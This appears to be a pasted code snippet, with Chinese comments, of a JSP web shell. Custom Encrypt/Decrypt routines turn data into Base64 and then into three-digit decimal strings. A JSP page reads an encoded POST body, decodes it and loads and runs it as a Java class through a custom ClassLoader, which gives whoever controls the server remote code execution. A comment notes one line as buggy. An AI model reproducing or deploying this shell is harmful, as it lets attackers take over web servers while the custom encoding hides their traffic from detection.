···

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
private byte[] Encrypt(byte[] data) throws Exception {

    // 1) Base64 编码,并替换符号

    String input = java.util.Base64.getEncoder()

            .encodeToString(data)

            .replace("+", "<")

            .replace("/", ">");



    // 2) 每字符转三位十进制 ASCII(不足3位补0)

    StringBuilder out = new StringBuilder(input.length() * 3);

    for (int i = 0; i < input.length(); i++) {

        int v = input.charAt(i);

        out.append((char)('0' + (v / 100)));

        out.append((char)('0' + ((v / 10) % 10)));

        out.append((char)('0' + (v % 10)));

    }



return out.toString().getBytes("UTF-8");

}



private byte[] Decrypt(byte[] data) throws Exception {

    // 1) 拿到数字字符串,去掉所有非数字(防止混入空白/换行)

    String raw = new String(data, "utf-8");

    String digits = raw.replaceAll("\\D", "");



    // 2) 长度必须是3的倍数

    if (digits.length() % 3 != 0) {

        throw new IllegalArgumentException("cipher length not multiple of 3: " + digits.length());

    }



    // 3) 每三位数字转回字符

    StringBuilder base64 = new StringBuilder(digits.length() / 3);

    for (int i = 0; i < digits.length(); i += 3) {

        int a = digits.charAt(i)   - '0';

        int b = digits.charAt(i+1) - '0';

        int c = digits.charAt(i+2) - '0';

        int ascii = a * 100 + b * 10 + c;

        base64.append((char) ascii);

    }



    // 4) 恢复符号并 Base64 解码

    String b64str = base64.toString().replace("<", "+").replace(">", "/");

    return java.util.Base64.getDecoder().decode(b64str);

}


<%!class X1 extends ClassLoader{
    X1(ClassLoader p){super(p);}
    public Class<?> zz(byte[] bb){return super.defineClass(bb,0,bb.length);}
}%><%
if("POST".equalsIgnoreCase(request.getMethod())){
    java.io.ByteArrayOutputStream o=new java.io.ByteArrayOutputStream();
    byte[] t=new byte[513];int l=request.getInputStream().read(t);
    while(l>0){o.write(java.util.Arrays.copyOfRange(t,0,l));l=request.getInputStream().read(t);}
    out.clear();out=pageContext.pushBody();
    Class<?> c=new X1(this.getClass().getClassLoader()).zz(Decrypt(o.toByteArray()));
    Object ins=c.newInstance();
    ins.equals(pageContext); //有问题
}
%>



private byte[] Encrypt(byte[] data) {

    StringBuilder sb = new StringBuilder();

    for (byte b : data) {

        sb.append(String.format("%03d", b & 0xFF)); // 每个字节固定用3位表示,如 001, 255

    }

    return sb.toString().getBytes();

}

private byte[] Decrypt(byte[] encrypted) {

    String str = new String(encrypted);

    int len = str.length() / 3;

    byte[] result = new byte[len];

    for (int i = 0; i < len; i++) {

        String part = str.substring(i * 3, i * 3 + 3);

        result[i] = (byte) Integer.parseInt(part);

    }

    return result;

}